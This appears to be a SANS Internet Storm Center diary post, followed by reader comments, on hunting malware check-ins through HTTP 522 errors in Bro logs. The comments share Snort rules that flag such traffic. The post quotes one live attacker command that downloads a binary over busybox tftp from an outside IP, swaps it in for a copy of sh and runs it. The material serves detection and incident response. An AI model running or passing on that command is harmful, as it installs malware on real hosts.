Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880) to keep an eye on HTTP error code 522 for possible malware check-ins. 522 code could mean several things, but as for IR it's a potential malicious host has been pulled offline and you have a client still trying to connect. So I got our Intern to check bro logs and see what he could find.
1467159441.247406 192.128.1.216 104.27.182.19 - 522
There was other traffic that was false positives, but you could easily tell that this IP was checking this site on a regular basis. Out of 4GB of compressed bro logs for the day we only had about 200 total lines that matched, so very low noise ratio.
cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.
-- Tom Webb @twsecblog |
Tom 59 Posts ISC Handler Aug 17th 2016 |
Thread locked Subscribe |
Aug 17th 2016 5 years ago |
Hi
That is a nice thing to check for. I made a SNORT IDS rule for that. alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; metadata:18082016; priority:2; sid:6001948; rev:1;) Happy hunting Lenny |
Anonymous |
Quote |
Aug 19th 2016 5 years ago |
Oh nice signature, may I respectfully recommend flow:established,from_server and classtype:bad-unknown?
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; flow:established,from_server; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; classtype:bad-unknown; metadata:18082016; priority:2; sid:6001948; rev:2;) Cheers, Nathan Fowler |
Anonymous |
Quote |
Aug 26th 2016 5 years ago |
Sign Up for Free or Log In to start participating in the conversation!